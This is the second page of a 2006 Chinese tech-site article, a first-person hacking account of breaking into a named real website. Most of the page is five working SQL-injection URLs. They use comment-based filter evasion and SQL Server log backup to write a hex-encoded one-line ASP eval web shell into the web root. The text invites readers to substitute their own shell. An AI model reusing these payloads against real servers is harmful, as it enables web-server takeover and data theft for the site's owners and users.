黑客实战：入侵联想网御全过程(2)

中华网科技 http://tech.china.com 2006-12-01 11:39:03

【进入BBS】【进入聊天室】【 推荐给朋友 】【浏览字号：大 中 小】【关闭窗口】

　　
拿起老周的工具开始备份，写上路径和数据库名字，开始备份。

看到?是成功备份了，但是没有成功的插入一句话。起先我还以为是不支持多句的缘故，后来看到深白在线，跟他聊了一下，他说DB_OWNER够用了。这句话是我动力的源泉啊，然后发了注入点给他，我们琢磨了好一阵子。通过看联想的错误返回报告才知道，原来是联想过滤了execute 怪不得了，最后我们手动LOG了一个eval端上去。

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/
init,no_truncate--

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;insert/**/into/**/
[shit_tmp](cmd)/**/values
(0x3c0025006500760061006c00200072006500710075006500730074002800220023002200290025003e00)--

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e006100730070005C007A007A002E00610073007000/**/backup/**/log/**/@a/**/to/**
/disk=@s/**/with/**/init,no_truncate--

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;Drop/**/table/**/
[shit_tmp]--

其中第3部中的values()括号里边的为1句话木马的16进制.大家可以自己转化自己的一句话放里边，这5步下来我们就成功拿到webshell了。因为我是在公司上的，为了不连累公司，我就不做下一步入侵了，给管理员发个信提示一下就可以了。

首页 上页 | 1 | 2 | 下页 尾页  共 2 页

作者：　来源：

发表言论： 笔　　名： 查看评论

网页 新闻 音乐 图片 论坛